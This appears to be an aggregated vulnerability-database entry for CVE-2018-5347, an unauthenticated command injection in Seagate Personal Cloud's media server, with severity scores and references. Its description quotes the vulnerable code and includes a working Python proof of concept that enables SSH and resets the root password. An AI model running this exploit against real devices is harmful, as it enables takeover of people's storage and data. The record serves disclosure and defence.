Details of VAR-201801-1503

ID

VAR-201801-1503

CVE

CVE-2018-5347

TITLE

Seagate Personal Cloud Seagate Media Server Command Injection Vulnerability

Trust: 1.2

sources: CNVD: CNVD-2018-04347 // CNNVD: CNNVD-201801-562

DESCRIPTION

Seagate Media Server in Seagate Personal Cloud has unauthenticated command injection in the uploadTelemetry and getLogs functions in views.py because .psp URLs are handled by the fastcgi.server component and shell metacharacters are mishandled. SeagatePersonalCloud is a personal cloud storage device from Seagate, USA. SeagateMediaServer is one of the media servers. An attacker could exploit this vulnerability to execute arbitrary commands with root privileges. Seagate Personal Cloud Home Media Storage is athe easiest way to store, organize, stream and share all your music, movies, photos, and important documents.a ## Credit An independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Securityas SecuriTeam Secure Disclosure program ## Vendor response Seagate was informed of the vulnerability on October 16, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory ## Vulnerabilities details Seagate Media Server uses Django web framework and is mapped to the .psp extension. Any URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol. /etc/lighttpd/conf.d/django-host.conf: ``` fastcgi.server += ( ".psp"=> (( "socket" => "/var/run/manage_py-fastcgi.socket", "check-local" => "disable", "stream-post" => "enable", "allow-x-send-file" => "enable", )), ".psp/"=> (( "socket" => "/var/run/manage_py-fastcgi.socket", "check-local" => "disable", "stream-post" => "enable", "allow-x-send-file" => "enable", )) ) ``` URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py. Two views were found to be affected by unauthenticated command injection. The affected views are: - uploadTelemetry - getLogs These views takes user input from GET parameters and pass these unvalidated/unsanitized to methods of the commands Python module. /usr/lib/django_host/seagate_media_server/views.py: ``` @csrf_exempt def uploadTelemetry(request): ts = request.GET.get('TimeStamp','') if (checkDBSQLite()) : response = '{"stat":"failed","code":"80","message":"The Database has not been initialized or mounted yet!"}' else : if ts == "": response = '{"stat":"failed","code":"380","message":"TimeStamp parameter missing"}' return HttpResponse(response); cmd = "/usr/local/bin/log_telemetry "+str(ts) commands.getoutput(cmd) return HttpResponse('{"stat":"ok"}') ``` /usr/lib/django_host/seagate_media_server/views.py: ``` @csrf_exempt def getLogs (request): try: cmd_base='/usr/bin/log-extract-manager.sh' uID = request.GET.get ( 'arch_id', None ) time_stamp = request.GET.get ( 'time_stamp', '' ) if uID: (status, output) = commands.getstatusoutput(cmd_base + ' status ' + uID); if ('In progress' in output) and (uID in output) : return HttpResponse ('{"stat":"ok", "data": {"status":"In Progress"}}') elif (status == 0) : return HttpResponse ('{"stat":"ok", "data": {"url":"%s", "fileSize":"%d"}}' % ( urllib.quote(output.encode('utf-8')), os.path.getsize(output) )) else : return HttpResponse ('{"stat":"failed", "code":"853","message":"Id not recognized."}' ) else: (status, output) = commands.getstatusoutput(cmd_base + ' start ' + time_stamp); if (status == 0) : return HttpResponse ('{"stat":"ok", "data": {"archiveID":"%s"}}' % (output)) return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' ) except : return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' ) ``` Note that both views contain the csrf_exempt decorator, which disables the default Cross-Site Request Forgery protection of Django. As such, these issues can be exploited via Cross-Site Request Forgery. ### Proof of Concept The following proof of concept will try to enable the SSH service, and change the root password. When successful it will be possible to log into the device over SSH with the new password. ``` #!/usr/bin/env python import os import urllib scheme = 'http' host = 'personalcloud.local' port = '80' path = 'uploadTelemetry.psp' querystr = 'TimeStamp=%3b' #path = 'getLogs.psp' #querystr = 'time_stamp=%3b' password = 'Welcome01' cmds = ['ngc --start sshd 2>&1', 'echo -e "%(s)s\n%(s)s"|passwd 2>&1' % {'s' : password}] for cmd in cmds: print 'Running command', repr(cmd) cmd = urllib.quote_plus(cmd) r = urllib.urlopen('%s://%s:%s/%s?%s%s' % (scheme, host, port, path, querystr, cmd)) print r.read() print 'Log in with', password os.system('ssh -p 2222 root@%s' % host) ```

Trust: 2.43

sources: NVD: CVE-2018-5347 // JVNDB: JVNDB-2018-001653 // CNVD: CNVD-2018-04347 // VULHUB: VHN-135378 // VULMON: CVE-2018-5347 // PACKETSTORM: 145932

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2018-04347

AFFECTED PRODUCTS

vendor:	seagate	model:	personal cloud	scope:	eq	version:	-	Trust: 1.0
vendor:	seagate	model:	personal cloud	scope:	-	version:	-	Trust: 0.8
vendor:	seagate	model:	technology personal cloud	scope:	-	version:	-	Trust: 0.6

sources: CNVD: CNVD-2018-04347 // JVNDB: JVNDB-2018-001653 // NVD: CVE-2018-5347

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2018-5347
value:	CRITICAL
Trust: 1.0
NVD:	CVE-2018-5347
value:	CRITICAL
Trust: 0.8
CNVD:	CNVD-2018-04347
value:	HIGH
Trust: 0.6
CNNVD:	CNNVD-201801-562
value:	CRITICAL
Trust: 0.6
VULHUB:	VHN-135378
value:	HIGH
Trust: 0.1
VULMON:	CVE-2018-5347
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2018-5347
severity:	HIGH
baseScore:	10.0
vectorString:	AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	10.0
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
CNVD:	CNVD-2018-04347
severity:	HIGH
baseScore:	10.0
vectorString:	AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	10.0
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-135378
severity:	HIGH
baseScore:	10.0
vectorString:	AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	10.0
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2018-5347
baseSeverity:	CRITICAL
baseScore:	9.8
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	3.9
impactScore:	5.9
version:	3.0
Trust: 1.8

sources: CNVD: CNVD-2018-04347 // VULHUB: VHN-135378 // VULMON: CVE-2018-5347 // JVNDB: JVNDB-2018-001653 // CNNVD: CNNVD-201801-562 // NVD: CVE-2018-5347

PROBLEMTYPE DATA

problemtype:	CWE-78	Trust: 1.1
problemtype:	CWE-77	Trust: 0.9

sources: VULHUB: VHN-135378 // JVNDB: JVNDB-2018-001653 // NVD: CVE-2018-5347

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201801-562

TYPE

operating system commend injection

Trust: 0.6

sources: CNNVD: CNNVD-201801-562

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-001653

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-135378 // VULMON: CVE-2018-5347

PATCH

title:

Personal Cloud

url:

https://www.seagate.com/jp/ja/consumer/backup/personal-cloud/

Trust: 0.8

sources: JVNDB: JVNDB-2018-001653

EXTERNAL IDS

db:	NVD	id:	CVE-2018-5347	Trust: 3.3
db:	EXPLOIT-DB	id:	43659	Trust: 2.4
db:	JVNDB	id:	JVNDB-2018-001653	Trust: 0.8
db:	CNNVD	id:	CNNVD-201801-562	Trust: 0.7
db:	CNVD	id:	CNVD-2018-04347	Trust: 0.6
db:	PACKETSTORM	id:	145932	Trust: 0.2
db:	SEEBUG	id:	SSVID-97283	Trust: 0.1
db:	VULHUB	id:	VHN-135378	Trust: 0.1
db:	VULMON	id:	CVE-2018-5347	Trust: 0.1

sources: CNVD: CNVD-2018-04347 // VULHUB: VHN-135378 // VULMON: CVE-2018-5347 // JVNDB: JVNDB-2018-001653 // PACKETSTORM: 145932 // CNNVD: CNNVD-201801-562 // NVD: CVE-2018-5347

REFERENCES

url:	https://blogs.securiteam.com/index.php/archives/3548	Trust: 3.2
url:	https://www.exploit-db.com/exploits/43659/	Trust: 2.5
url:	https://nvd.nist.gov/vuln/detail/cve-2018-5347	Trust: 0.9
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-5347	Trust: 0.8
url:	https://cwe.mitre.org/data/definitions/78.html	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1

CREDITS

Yorick Koster

Trust: 0.1

sources: PACKETSTORM: 145932

SOURCES

db:	CNVD	id:	CNVD-2018-04347
db:	VULHUB	id:	VHN-135378
db:	VULMON	id:	CVE-2018-5347
db:	JVNDB	id:	JVNDB-2018-001653
db:	PACKETSTORM	id:	145932
db:	CNNVD	id:	CNNVD-201801-562
db:	NVD	id:	CVE-2018-5347

LAST UPDATE DATE

2024-11-23T22:52:13.364000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2018-04347	date:	2018-03-06T00:00:00
db:	VULHUB	id:	VHN-135378	date:	2019-10-03T00:00:00
db:	VULMON	id:	CVE-2018-5347	date:	2019-10-03T00:00:00
db:	JVNDB	id:	JVNDB-2018-001653	date:	2018-02-28T00:00:00
db:	CNNVD	id:	CNNVD-201801-562	date:	2019-10-23T00:00:00
db:	NVD	id:	CVE-2018-5347	date:	2024-11-21T04:08:37.910

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2018-04347	date:	2018-03-06T00:00:00
db:	VULHUB	id:	VHN-135378	date:	2018-01-12T00:00:00
db:	VULMON	id:	CVE-2018-5347	date:	2018-01-12T00:00:00
db:	JVNDB	id:	JVNDB-2018-001653	date:	2018-02-28T00:00:00
db:	PACKETSTORM	id:	145932	date:	2018-01-16T18:02:22
db:	CNNVD	id:	CNNVD-201801-562	date:	2018-01-16T00:00:00
db:	NVD	id:	CVE-2018-5347	date:	2018-01-12T01:29:00.200